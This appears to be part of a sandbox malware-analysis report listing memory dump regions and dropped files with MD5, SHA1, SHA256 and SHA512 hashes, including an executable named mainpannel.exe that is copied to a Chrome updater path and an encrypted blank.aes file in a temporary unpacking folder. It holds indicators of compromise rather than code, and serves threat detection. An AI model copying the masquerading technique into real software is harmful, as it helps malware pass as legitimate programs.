SHA1 d69a9b01e46a84347317f93898c270b0df1fd4ca
SHA256 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec
SHA512 e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe

memory/1568-187-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/2036-197-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/2036-199-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/1344-173-0x00007FF7EE270000-0x00007FF7F1AFE000-memory.dmp

memory/4384-201-0x000000001B6F0000-0x000000001B700000-memory.dmp

memory/4328-200-0x0000000005390000-0x00000000053A0000-memory.dmp

memory/2036-198-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/4884-206-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/2036-205-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/4884-208-0x000001EBF92B0000-0x000001EBF92C0000-memory.dmp

memory/2036-209-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/1672-211-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/1672-213-0x00000150DA000000-0x00000150DA010000-memory.dmp

memory/2036-210-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/2036-207-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/4884-215-0x000001EBF92B0000-0x000001EBF92C0000-memory.dmp

memory/2036-214-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/2036-216-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/4384-218-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/2036-212-0x000001CFA2600000-0x000001CFA2601000-memory.dmp

memory/1664-235-0x00007FFCE5400000-0x00007FFCE59E9000-memory.dmp

memory/4384-237-0x000000001BE40000-0x000000001BE90000-memory.dmp

\??\c:\users\admin\appdata\local\temp\mainpannel.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

memory/4384-240-0x000000001BF50000-0x000000001C002000-memory.dmp

memory/1664-250-0x00007FFCFA690000-0x00007FFCFA6BD000-memory.dmp

memory/1344-234-0x00007FF7EE270000-0x00007FF7F1AFE000-memory.dmp

memory/1664-239-0x00007FFCF3D20000-0x00007FFCF3D2F000-memory.dmp

memory/1664-251-0x00007FFCFA670000-0x00007FFCFA689000-memory.dmp

memory/1664-236-0x00007FFCE7E20000-0x00007FFCE7E43000-memory.dmp

memory/1664-253-0x00007FFCFA640000-0x00007FFCFA663000-memory.dmp

memory/1664-255-0x00007FFCE2EF0000-0x00007FFCE3067000-memory.dmp

memory/1664-257-0x00007FFCFA620000-0x00007FFCFA639000-memory.dmp

memory/1664-259-0x00007FFCFA610000-0x00007FFCFA61D000-memory.dmp

memory/1664-261-0x00007FFCEBAA0000-0x00007FFCEBACE000-memory.dmp

memory/1664-265-0x00007FFCE6090000-0x00007FFCE6408000-memory.dmp

memory/1664-263-0x00007FFCE8190000-0x00007FFCE8248000-memory.dmp

memory/1664-267-0x00007FFCFA460000-0x00007FFCFA474000-memory.dmp

memory/1664-273-0x00007FFCE7EF0000-0x00007FFCE800C000-memory.dmp

memory/1664-276-0x00007FFCFA600000-0x00007FFCFA60D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\blank.aes

MD5 07b71b817dd774c5f88c5526790fcbc9
SHA1 6000351cb67edf2275b1b499e0fb01bbe693b1f2
SHA256 8f0927d471642856553a04b32a6527b9deebdfcaadc5b0b6f91cf7fc5cb66038
SHA512 295fa6d16b15a7b425ec4031f05e34ec159ca0129a5a59ca8b0c6fd146d809fc9834e1eccb8f1aa3ffb8b87bc9ba63bb6688b596b22b92e03f053297e16a6b0d

memory/1672-284-0x00000150DA000000-0x00000150DA010000-memory.dmp

memory/4132-285-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/4132-286-0x0000025AE1C90000-0x0000025AE1CA0000-memory.dmp

memory/1672-287-0x00000150DA000000-0x00000150DA010000-memory.dmp

memory/4884-288-0x000001EBF92B0000-0x000001EBF92C0000-memory.dmp

memory/4132-289-0x0000025AE1C90000-0x0000025AE1CA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 89b9b22e2cb6f0b903e7f8755f49d7be
SHA1 e13b62b19dccdbacb5fec9227e34f21e34fe5cad
SHA256 17b31393e036af7d83e6ea288a0bbad0278c404f5e0698b3a28f2fa1faa99537
SHA512 f4817348aa7f297c7c81db010bc0ce09c9193c32f0f7c2b0592df0c7731921830b5a3868486f986edfd863d7d82815e67598392b94782b9d317b7066b9fb7064

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0e03199bce6ab252842ea6cd23cd571b
SHA1 0c2ea490a060d1515bab6824652a31dd0ec46f7e
SHA256 41eab7c934321c8d7cc001e1c0eba588216f6f8938ffc25318d3e31c069df376
SHA512 3a608f93077e7c70d87978b11e45be93ff70e1ffdf0631fb89ad8de40ccdf9589b777a0578e5eff96ef83588d3273768bba1cf66a060c38a8bc53ed68d71f851

memory/4132-293-0x0000025AE1C90000-0x0000025AE1CA0000-memory.dmp

memory/4132-297-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/4884-296-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/4328-298-0x0000000075310000-0x0000000075AC0000-memory.dmp

memory/3144-299-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0e03199bce6ab252842ea6cd23cd571b
SHA1 0c2ea490a060d1515bab6824652a31dd0ec46f7e
SHA256 41eab7c934321c8d7cc001e1c0eba588216f6f8938ffc25318d3e31c069df376
SHA512 3a608f93077e7c70d87978b11e45be93ff70e1ffdf0631fb89ad8de40ccdf9589b777a0578e5eff96ef83588d3273768bba1cf66a060c38a8bc53ed68d71f851

\??\c:\program files\google\chrome\updater.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

C:\Program Files\Google\Chrome\updater.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5